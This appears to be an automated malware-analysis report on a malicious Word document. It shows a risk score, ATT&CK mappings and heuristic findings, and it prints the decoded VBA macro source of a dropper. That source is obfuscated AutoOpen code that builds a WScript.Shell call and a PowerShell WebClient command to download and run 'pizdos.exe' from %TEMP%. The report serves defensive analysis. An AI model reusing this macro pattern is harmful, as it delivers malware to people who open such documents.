MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for initial execution. The script uses CreateObject to instantiate a WebClient object and downloads a file named 'pizdos.exe' to the '%TEMP%' directory. It then attempts to execute this downloaded file using PowerShell. The ClamAV detection 'Doc.Dropper.Agent-6329123-0' further supports its malicious nature as a dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6329123-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6329123-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2000 bytes |
SHA-256: 505dd10e866bd2f2e012914852af30ce90bc18cd1bfb6d528a21bbdb7b7a8869 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Call pPjsJp
End Sub
Attribute VB_Name = "jhdf"
Function pPjsJp()
ffRT = ofjdt.TextBox1
LdKr = "scrip"
jfJerjJ = LdKr + ffRT
Set JOdjr = CreateObject("W" + jfJerjJ)
JOdjr.Run OJej, 0
End Function
Attribute VB_Name = "fjty"
Attribute VB_Base = "0{D67A564D-76B8-427E-AB75-04D18217085D}{010A7AB5-C01D-4E18-B447-1F5944F8A8CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "zxfjy"
Attribute VB_Base = "0{FD203EAD-27D6-4FDA-8AAB-597E189B9423}{874FE3A8-74AA-4CE7-AFD3-2D4FAB6EA8EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "KHdryy"
Function OJej()
fhgrtt = "(" + zxfjy.yuthhf + zxfjy.vbcffg + "System.Net.WebClient)"
bxcvjs = ".Dow" + ofjdt.ogfhj + "ile"
JIjer = "('ht" + fjty.fgjt + "hp','%" + ofjdt.ytu + "%\pizdos.exe');"
vcber = "Start-" + "Process '%" + ofjdt.ytu + "%\pizdos.exe';"
OJej = ofjdt.rty + " /c " + zxfjy.tyre + zxfjy.ytef + zxfjy.nmgf + "" + fhgrtt + bxcvjs + JIjer + vcber + ""
End Function
Attribute VB_Name = "ofjdt"
Attribute VB_Base = "0{6605AA02-BD65-424E-BC7B-F6F0701295F2}{B817CDFE-BA49-453B-8848-623034F79131}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.